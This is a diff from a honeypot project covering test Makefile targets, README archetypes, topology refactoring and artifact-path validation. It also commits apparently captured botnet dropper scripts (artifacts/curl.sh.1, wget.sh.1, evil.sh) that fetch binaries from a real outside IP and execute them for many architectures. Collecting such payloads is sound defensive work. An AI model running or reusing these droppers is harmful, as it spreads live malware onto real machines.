fix(test/schema): pin xdist_group to prevent multi-server startup, cap workers at 4

fix(deps): pin urllib3>=2.7.0 to resolve CVE-2026-44431 and CVE-2026-44432
feat(test): add test-schema target and SCHEMA_QUICK=1 mode for schemathesis
2026-05-16 18:36:26 -04:00 · 2026-05-16 18:26:47 -04:00 · 2026-05-16 18:25:40 -04:00 · 2026-05-10 22:45:05 -04:00 · 2026-05-10 22:43:33 -04:00 · 2026-05-10 22:39:24 -04:00
963 changed files with 93452 additions and 9225 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -51,3 +51,22 @@ schem

 # pydeps-style dependency graph dumps from local analysis runs.
 deps.txt
+
+# Node modules vendored under decnet/canary/ for the obfuscator helper.
+# The package.json is the source of truth; modules are reinstalled at
+# build/deploy time.
+node_modules/
+package-lock.json
+
+# TTP rule-precision corpus pulled from prod sqlite. Real attacker
+# payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
+# files alongside ARE committed and exercise the harness in CI.
+tests/ttp/rule_precision/corpus/*.jsonl
+tests/ttp/rule_precision/corpus/seed_*.jsonl
+threatfox-api.json
+
+# MITRE ATT&CK STIX bundle — 50 MB, fetched at runtime via attack_stix.py
+enterprise-attack-*.json
+
+# pytest failure dump files
+testfail
--- a/219
+++ b/219
@@ -0,0 +1,219 @@
+PYTEST     := .311/bin/pytest
+FAIL_FAST  ?= 1
+ARGS       :=
+
+# addopts in pyproject.toml already provides -v -q -x -n 4 --dist load.
+# Unit suites inherit that; special suites clear it with --override-ini.
+UNIT_FLAGS  := --timeout=30 --timeout-method=thread
+SEQ_FLAGS   := --override-ini="addopts=-v -x" -n logical --timeout=120 --timeout-method=thread
+FUZZ_FLAGS  := --override-ini="addopts=-v -x" -n logical -m fuzz \
+	--ignore=tests/api/test_schemathesis.py \
+	--ignore=tests/api/test_schemathesis_agent.py \
+	--ignore=tests/api/test_schemathesis_swarm.py \
+	--ignore=tests/api/test_schemathesis_ttp.py
+SCHEMA_QUICK ?= 0
+SCHEMA_FLAGS := --override-ini="addopts=-v -x" -n 4 -m fuzz --timeout=600 --timeout-method=thread
+BENCH_FLAGS := --override-ini="addopts=-v" -p no:xdist --benchmark-only -m bench
+
+# ── Unit suites (xdist, 30s timeout) ─────────────────────────────────────────
+
+.PHONY: test-core
+test-core:
+	$(PYTEST) tests/core tests/config tests/factories tests/fixtures $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-web
+test-web:
+	$(PYTEST) tests/web tests/services $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-db
+test-db:
+	$(PYTEST) tests/db tests/vectorstore $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-bus
+test-bus:
+	$(PYTEST) tests/bus tests/logging tests/telemetry $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-ttp
+test-ttp:
+	$(PYTEST) tests/ttp $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-intel
+test-intel:
+	$(PYTEST) tests/intel tests/asn tests/geoip $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-analysis
+test-analysis:
+	$(PYTEST) tests/clustering tests/correlation $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-infra
+test-infra:
+	$(PYTEST) tests/agent tests/collector tests/sniffer tests/profiler $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-fleet
+test-fleet:
+	$(PYTEST) tests/fleet tests/swarm tests/topology tests/orchestrator tests/deploy tests/updater $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-cli
+test-cli:
+	$(PYTEST) tests/cli tests/engine tests/mutator tests/realism $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-features
+test-features:
+	$(PYTEST) tests/canary tests/artifacts tests/webhook tests/decky_io tests/prober $(UNIT_FLAGS) $(ARGS)
+
+# ── Go and React suites ───────────────────────────────────────────────────────
+
+_GO_MODULES := \
+	decnet/templates/_caddy_modules/decnetfp \
+	decnet/templates/http/_caddy_modules/decnetfp \
+	decnet/templates/https/_caddy_modules/decnetfp
+
+.PHONY: test-go
+test-go:
+	@failed=""; \
+	for mod in $(_GO_MODULES); do \
+		echo "=== go test: $$mod ==="; \
+		if (cd "$$mod" && go test ./...); then \
+			echo "[PASS] $$mod"; \
+		else \
+			echo "[FAIL] $$mod"; \
+			failed="$$failed $$mod"; \
+			if [ "$(FAIL_FAST)" = "1" ]; then exit 1; fi; \
+		fi; \
+	done; \
+	[ -z "$$failed" ]
+
+.PHONY: test-react
+test-react:
+	cd decnet_web && npm run test:run $(ARGS)
+
+# ── Special suites (sequential, longer timeout) ───────────────────────────────
+
+.PHONY: test-live
+test-live:
+	$(PYTEST) tests/live -m live $(SEQ_FLAGS) $(ARGS)
+
+.PHONY: test-api
+test-api:
+	$(PYTEST) tests/api $(SEQ_FLAGS) $(ARGS)
+
+.PHONY: test-stress
+test-stress:
+	$(PYTEST) tests/stress -m stress $(SEQ_FLAGS) $(ARGS)
+
+.PHONY: test-service
+test-service:
+	$(PYTEST) tests/service_testing $(SEQ_FLAGS) $(ARGS)
+
+.PHONY: test-fuzz
+test-fuzz:
+	$(PYTEST) $(FUZZ_FLAGS) $(ARGS)
+
+.PHONY: test-schema
+test-schema:
+	SCHEMA_QUICK=$(SCHEMA_QUICK) $(PYTEST) \
+		tests/api/test_schemathesis.py \
+		tests/api/test_schemathesis_agent.py \
+		tests/api/test_schemathesis_swarm.py \
+		tests/api/test_schemathesis_ttp.py \
+		$(SCHEMA_FLAGS) $(ARGS)
+
+.PHONY: test-bench
+test-bench:
+	$(PYTEST) tests/perf $(BENCH_FLAGS) $(ARGS)
+
+.PHONY: test-docker
+test-docker:
+	DECNET_LIVE_DOCKER=1 $(PYTEST) tests/docker -m docker $(SEQ_FLAGS) $(ARGS)
+
+# ── Static analysis ───────────────────────────────────────────────────────────
+
+.PHONY: test-mypy
+test-mypy:
+	.311/bin/mypy decnet --ignore-missing-imports --no-error-summary
+
+.PHONY: test-bandit
+test-bandit:
+	.311/bin/bandit -r decnet -c pyproject.toml
+
+.PHONY: test-vulture
+test-vulture:
+	.311/bin/vulture decnet --min-confidence 80
+
+.PHONY: test-pip-audit
+test-pip-audit:
+	.311/bin/pip-audit
+
+# ── Composite: all suites ─────────────────────────────────────────────────────
+
+_ALL_SUITES := core web db bus ttp intel analysis infra fleet cli features \
+               go react \
+               live api schema stress service fuzz bench docker \
+               mypy bandit vulture pip-audit
+
+.PHONY: test-all test
+test-all test:
+	@failed=""; \
+	for suite in $(_ALL_SUITES); do \
+		echo ""; \
+		echo "══════════════════════════ $$suite ══════════════════════════"; \
+		if $(MAKE) --no-print-directory test-$$suite ARGS="$(ARGS)"; then \
+			echo "[PASS] $$suite"; \
+		else \
+			echo "[FAIL] $$suite"; \
+			failed="$$failed $$suite"; \
+			if [ "$(FAIL_FAST)" = "1" ]; then \
+				echo "Stopping at first failure. Use FAIL_FAST=0 to run all suites."; \
+				exit 1; \
+			fi; \
+		fi; \
+	done; \
+	if [ -n "$$failed" ]; then \
+		echo ""; \
+		echo "Failed:$$failed"; \
+		exit 1; \
+	fi; \
+	echo ""; \
+	echo "All suites passed."
+
+.PHONY: help
+help:
+	@echo "Unit suites (xdist, 30s timeout):"
+	@echo "  make test-core      tests/core + config + factories + fixtures"
+	@echo "  make test-web       tests/web + services"
+	@echo "  make test-db        tests/db + vectorstore"
+	@echo "  make test-bus       tests/bus + logging + telemetry"
+	@echo "  make test-ttp       tests/ttp"
+	@echo "  make test-intel     tests/intel + asn + geoip"
+	@echo "  make test-analysis  tests/clustering + correlation"
+	@echo "  make test-infra     tests/agent + collector + sniffer + profiler"
+	@echo "  make test-fleet     tests/fleet + swarm + topology + orchestrator + deploy + updater"
+	@echo "  make test-cli       tests/cli + engine + mutator + realism"
+	@echo "  make test-features  tests/canary + artifacts + webhook + decky_io + prober"
+	@echo ""
+	@echo "Go / React suites:"
+	@echo "  make test-go        go test ./... in each Caddy module variant"
+	@echo "  make test-react     vitest run in decnet_web"
+	@echo ""
+	@echo "Special suites (sequential, 120s timeout):"
+	@echo "  make test-live      tests/live"
+	@echo "  make test-api       tests/api  (schemathesis)"
+	@echo "  make test-stress    tests/stress"
+	@echo "  make test-service   tests/service_testing"
+	@echo "  make test-schema              schemathesis contract tests (-m fuzz, xdist logical)"
+	@echo "  make test-schema SCHEMA_QUICK=1   same, capped at 100 examples per test"
+	@echo "  make test-fuzz      hypothesis fuzz (all normal dirs, -m fuzz, skips schemathesis files)"
+	@echo "  make test-bench     tests/perf"
+	@echo "  make test-docker    tests/docker  (needs DECNET_LIVE_DOCKER=1)"
+	@echo ""
+	@echo "Static analysis:"
+	@echo "  make test-mypy      mypy type check on decnet/"
+	@echo "  make test-bandit    bandit security scan on decnet/"
+	@echo "  make test-vulture   vulture dead code scan (>=80% confidence)"
+	@echo "  make test-pip-audit pip-audit dependency vulnerability scan"
+	@echo ""
+	@echo "Composites:"
+	@echo "  make test-all       ALL suites (unit + go + react + live + api + schema + fuzz + bench + stress + docker + static analysis)"
+	@echo "  make test-all FAIL_FAST=0   same, report all failures instead of stopping"
+	@echo ""
+	@echo "Passthrough: make test-web ARGS='--lf -s'"
--- a/README.md
+++ b/README.md
@@ -182,6 +182,7 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre

 | Slug | Services | OS Fingerprint | Description |
 |---|---|---|---|
+| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. |
 | `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
 | `windows-server` | smb, rdp, ldap | windows | Windows domain member |
 | `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
@@ -272,6 +273,11 @@ List live at any time with `decnet services`.
 Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.

 ```ini
+[deaddeck-1]
+amount=1
+archetype=deaddeck
+ssh.password=admin
+
 [decky-webmail.http]
 server_header = Apache/2.4.54 (Debian)
 fake_app      = wordpress
--- a/artifacts/curl.sh
+++ b/artifacts/curl.sh
@@ -0,0 +1,3 @@
+[0] Downloading 'http://31.56.209.39/curl.sh' ...
+Saving 'curl.sh.1'
+HTTP response 200 OK [http://31.56.209.39/curl.sh]
--- a/artifacts/curl.sh.1
+++ b/artifacts/curl.sh.1
@@ -0,0 +1,46 @@
+#!/bin/sh
+ulimit -n 4096
+ulimit -n 999999
+ulimit -v 2097152
+cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
+rm -rf odin*
+rm -rf bizy*
+rm -rf rs*
+rm -rf *.sh
+
+#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
+#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
+#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
+#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
+#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
+#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
+#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
+#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
+#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
+#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
+
+curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
+curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
+curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
+curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
+curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
+curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
+curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
+curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
+curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
+curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
+curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
+curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
+curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
+
+curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
+curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
+curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
+curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
+curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
+curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
+curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
+curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
+curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
+curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
+curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
--- a/artifacts/evil.sh
+++ b/artifacts/evil.sh
@@ -0,0 +1,3 @@
+ wget http://31.56.209.39/wget.sh -o wget.sh
+
+ wget http://31.56.209.39/curl.sh -o curl.sh
--- a/artifacts/wget.sh
+++ b/artifacts/wget.sh
@@ -0,0 +1,3 @@
+[0] Downloading 'http://31.56.209.39/wget.sh' ...
+Saving 'wget.sh.1'
+HTTP response 200 OK [http://31.56.209.39/wget.sh]
--- a/artifacts/wget.sh.1
+++ b/artifacts/wget.sh.1
@@ -0,0 +1,46 @@
+#!/bin/sh
+ulimit -n 4096
+ulimit -n 999999
+ulimit -v 2097152
+cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
+rm -rf odin*
+rm -rf bizy*
+rm -rf rs*
+rm -rf *.sh
+
+wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
+wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
+wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
+wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
+wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
+wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
+wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
+wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
+wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
+wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
+
+wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
+wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
+wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
+wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
+wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
+wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
+wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
+wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
+wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
+wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
+wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
+wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
+wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
+
+wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
+wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
+wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
+wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
+wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
+wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
+wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
+wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
+wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
+wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
+wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
--- a/bait/.gitkeep
+++ b/bait/.gitkeep
--- a/bait/README.md
+++ b/bait/README.md
@@ -0,0 +1,5 @@
+# bait/
+
+Default operator-supplied email seed for IMAP/POP3 deckies. Drop `*.eml` and/or `*.json` files here; the IMAP/POP3 services bind-mount this dir read-only at `/var/spool/decnet-emails/seed` when no per-decky `email_seed` is configured. Entries concatenate onto the hardcoded bait baseline (additive to realism-engine output, never replacing).
+
+JSON shape: list of dicts with required `from_addr`, `to_addr`, `subject`, `body`; optional `from_name`, `date`, `flags`. See `decnet/templates/imap/server.py` for the loader.
--- a/decnet.tar
+++ b/decnet.tar
--- a/decnet/agent/executor.py
+++ b/decnet/agent/executor.py
@@ -194,7 +194,7 @@ async def self_destruct() -> None:
        argv = ["/bin/bash", path]
        spawn_kwargs = {"start_new_session": True}

-    subprocess.Popen(  # nosec B603
+    subprocess.Popen(  # type: ignore[call-overload]  # nosec B603
        argv,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
--- a/decnet/agent/heartbeat.py
+++ b/decnet/agent/heartbeat.py
@@ -121,7 +121,7 @@ def start() -> Optional[asyncio.Task]:
        return None

    try:
-        from decnet import __version__ as _v
+        from decnet import __version__ as _v  # type: ignore[attr-defined]
        agent_version = _v
    except Exception:
        agent_version = "unknown"
--- a/decnet/agent/topology_ops.py
+++ b/decnet/agent/topology_ops.py
@@ -59,6 +59,73 @@ def _topology_id(hydrated: dict[str, Any]) -> str:
    return str(tid)


+def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
+    """Verify hash integrity and structural validity; return topology_id."""
+    local_hash = canonical_hash(hydrated)
+    if local_hash != version_hash:
+        raise HashMismatch(
+            f"master hash {version_hash!r} does not match agent hash "
+            f"{local_hash!r} — refusing to apply"
+        )
+    issues = _validate_topology(hydrated)
+    if _validation_errors(issues):
+        raise ValidationError(issues)
+    return _topology_id(hydrated)
+
+
+async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
+    """Tear down the current topology if it differs from topology_id.
+
+    Master is authoritative — a different pinned topology (fully applied,
+    partially applied, or drifted) is torn down before the new apply proceeds.
+    Refusing with 409 would leave the agent stuck in a state only a human
+    could resolve.
+    """
+    existing = store.current()
+    if existing is None or existing.topology_id == topology_id:
+        return
+    log.info(
+        "superseding topology %s with %s on master authority",
+        existing.topology_id, topology_id,
+    )
+    try:
+        await teardown(existing.topology_id, store)
+    except Exception as exc:  # noqa: BLE001 — we still want to try applying
+        log.warning(
+            "best-effort teardown of superseded topology %s failed: %s",
+            existing.topology_id, exc,
+        )
+        # Hard-clear the store row so the new apply isn't blocked by a
+        # half-torn-down predecessor.  Leftover docker objects surface via
+        # the next heartbeat's observed block.
+        store.clear(existing.topology_id)
+
+
+def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
+    """Create bridge networks, write compose file, and bring up containers.
+
+    Sync/blocking — callers must dispatch via asyncio.to_thread.
+
+    ``--always-recreate-deps`` keeps service containers' netns shares
+    fresh: every decky service joins its base's netns via
+    ``network_mode: container:<base>``, and that share is bound at
+    service start time. If a base is recreated (e.g. when ``ports:``
+    changes after toggling ``forwards_l3``) but compose decides the
+    services are unchanged, the services keep a stale netns FD
+    pointing at the destroyed base — they end up in an empty
+    namespace with only ``lo``, and external traffic hits a closed
+    port on the live base. Forcing dependents to recreate alongside
+    the base is the cheapest way to make this race impossible.
+    """
+    compose_path = _topology_compose_path(topology_id)
+    client = docker.from_env()
+    for lan in hydrated["lans"]:
+        net_name = _topology_network_name(topology_id, lan["name"])
+        create_bridge_network(client, net_name, lan["subnet"], internal=not lan["is_dmz"])
+    write_topology_compose(hydrated, compose_path)
+    _compose_with_retry("up", "--build", "-d", "--always-recreate-deps", compose_file=compose_path)
+
+
 async def apply(
    hydrated: dict[str, Any],
    version_hash: str,
@@ -73,76 +140,11 @@ async def apply(
      Any docker / compose error propagates up; the endpoint maps it
        to 500 and records the message on the store row.
    """
-    local_hash = canonical_hash(hydrated)
-    if local_hash != version_hash:
-        raise HashMismatch(
-            f"master hash {version_hash!r} does not match agent hash "
-            f"{local_hash!r} — refusing to apply"
-        )
-
-    issues = _validate_topology(hydrated)
-    if _validation_errors(issues):
-        raise ValidationError(issues)
-
-    topology_id = _topology_id(hydrated)
-    # Master is authoritative.  If a different topology is pinned here
-    # — whether it fully applied, only partially applied (failure
-    # marker row + orphan containers), or drifted — teardown first,
-    # then accept the new one.  Refusing with 409 would leave the
-    # agent stuck in a state only a human could resolve.
-    existing = store.current()
-    if existing is not None and existing.topology_id != topology_id:
-        log.info(
-            "superseding topology %s with %s on master authority",
-            existing.topology_id, topology_id,
-        )
-        try:
-            await teardown(existing.topology_id, store)
-        except Exception as exc:  # noqa: BLE001 — we still want to try applying
-            log.warning(
-                "best-effort teardown of superseded topology %s failed: %s",
-                existing.topology_id, exc,
-            )
-            # Hard-clear the store row so the new apply isn't blocked
-            # by a half-torn-down predecessor.  Leftover docker objects
-            # will surface via the next heartbeat's observed block.
-            store.clear(existing.topology_id)
-
-    lans = hydrated["lans"]
-    compose_path = _topology_compose_path(topology_id)
-    client = docker.from_env()
-
-    # Bridges + compose are sync/blocking; hop to a thread so we don't
-    # stall the event loop on a slow docker daemon.
-    def _materialise() -> None:
-        for lan in lans:
-            net_name = _topology_network_name(topology_id, lan["name"])
-            internal = not lan["is_dmz"]
-            create_bridge_network(
-                client, net_name, lan["subnet"], internal=internal
-            )
-        write_topology_compose(hydrated, compose_path)
-        # ``--always-recreate-deps`` keeps service containers' netns shares
-        # fresh: every decky service joins its base's netns via
-        # ``network_mode: container:<base>``, and that share is bound at
-        # service start time. If a base is recreated (e.g. when ``ports:``
-        # changes after toggling ``forwards_l3``) but compose decides the
-        # services are unchanged, the services keep a stale netns FD
-        # pointing at the destroyed base — they end up in an empty
-        # namespace with only ``lo``, and external traffic hits a closed
-        # port on the live base. Forcing dependents to recreate alongside
-        # the base is the cheapest way to make this race impossible.
-        _compose_with_retry(
-            "up", "--build", "-d", "--always-recreate-deps",
-            compose_file=compose_path,
-        )
-
-    await asyncio.to_thread(_materialise)
-
+    topology_id = _check_hash_and_validate(hydrated, version_hash)
+    await _teardown_superseded(topology_id, store)
+    await asyncio.to_thread(_materialise, hydrated, topology_id)
    store.put(topology_id, version_hash, hydrated)
-    log.info(
-        "topology %s applied on agent (%d LANs)", topology_id, len(lans)
-    )
+    log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))


 async def teardown(
--- a/decnet/agent/topology_store.py
+++ b/decnet/agent/topology_store.py
@@ -63,6 +63,7 @@ class TopologyStore:
        # The agent is single-process, so there's no real contention —
        # sqlite's own connection lock is enough.
        self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
+        self._conn.row_factory = sqlite3.Row
        self._conn.execute(
            "CREATE TABLE IF NOT EXISTS applied_topology ("
            " topology_id TEXT PRIMARY KEY,"
@@ -84,11 +85,11 @@ class TopologyStore:
        if row is None:
            return None
        return AppliedRow(
-            topology_id=row[0],
-            applied_version_hash=row[1],
-            hydrated=json.loads(row[2]),
-            applied_at=int(row[3]),
-            last_error=row[4],
+            topology_id=row["topology_id"],
+            applied_version_hash=row["applied_version_hash"],
+            hydrated=json.loads(row["hydrated_blob_json"]),
+            applied_at=int(row["applied_at"]),
+            last_error=row["last_error"],
        )

    # ---------------------------------------------------------------- writes
--- a/decnet/artifacts/init.py
+++ b/decnet/artifacts/init.py
@@ -0,0 +1 @@
+"""Artifact storage helpers shared between the web router and TTP workers."""
--- a/decnet/artifacts/paths.py
+++ b/decnet/artifacts/paths.py
@@ -0,0 +1,86 @@
+"""
+Shared on-disk artifact path resolution.
+
+Honeypot decoys (SSH, SMTP) farm captured payloads into a host-mounted
+quarantine tree:
+
+    /var/lib/decnet/artifacts/{decky}/{service}/{stored_as}
+
+Two callers need to translate ``(decky, stored_as, service)`` into a
+concrete ``Path`` rooted under that tree:
+
+* The web router endpoint ``GET /api/v1/artifacts/{decky}/{stored_as}``
+  (``decnet.web.router.artifacts.api_get_artifact``) — admin-gated
+  download for the dashboard.
+* The TTP ``EmailLifter`` (``decnet.ttp.impl.email_lifter``), which
+  reads the stored ``.eml`` at tag-time so body-aware predicates
+  (R0047 BEC, R0048 macro) don't need raw body text on the bus.
+
+Both callers share the same validation rules and the same
+defence-in-depth symlink-escape check; this module is the single
+implementation. It is auth-agnostic — wrappers layer authentication
+where appropriate (the router does ``require_admin``, the lifter does
+not).
+"""
+
+from __future__ import annotations
+
+import os
+import re
+from pathlib import Path
+
+# decky names come from the deployer — lowercase alnum plus hyphens.
+_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
+
+# Services that own an artifacts subdir. Kept explicit so a caller
+# can't pivot into arbitrary subpaths via a query string or bus payload.
+_ALLOWED_SERVICES = frozenset({"ssh", "smtp"})
+
+# stored_as is assembled by the capturing template as:
+#   ${ts}_${sha:0:12}_${base}
+# where ts is ISO-8601 UTC (e.g. 2026-04-18T02:22:56Z), sha is 12 hex chars,
+# and base is the original filename's basename. Keep the filename charset
+# tight but allow common punctuation dropped files actually use.
+_STORED_AS_RE = re.compile(
+    r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z_[a-f0-9]{12}_[A-Za-z0-9._-]{1,255}$"
+)
+
+# Module-level so tests can monkeypatch. Override via env in production
+# (the systemd unit sets this) — the prod path matches the bind mount
+# declared in decnet/services/{ssh,smtp}.py.
+ARTIFACTS_ROOT = Path(
+    os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
+)
+
+
+class ArtifactPathError(ValueError):
+    """Raised when (decky, stored_as, service) fails validation or escapes
+    the artifacts root.
+
+    The router catches this and re-raises HTTPException(400). The lifter
+    catches it and treats the event as having no body available (no-tag).
+    """
+
+
+def resolve_artifact_path(decky: str, stored_as: str, service: str) -> Path:
+    """Validate inputs, resolve the on-disk path, and confirm it stays
+    inside the artifacts root.
+
+    Raises :class:`ArtifactPathError` on any violation. Does NOT check
+    that the file exists — callers handle that distinctly (404 for the
+    router, no-tag for the lifter).
+    """
+    if service not in _ALLOWED_SERVICES:
+        raise ArtifactPathError("invalid service")
+    if not _DECKY_RE.fullmatch(decky):
+        raise ArtifactPathError("invalid decky name")
+    if not _STORED_AS_RE.fullmatch(stored_as):
+        raise ArtifactPathError("invalid stored_as")
+
+    root = ARTIFACTS_ROOT.resolve()
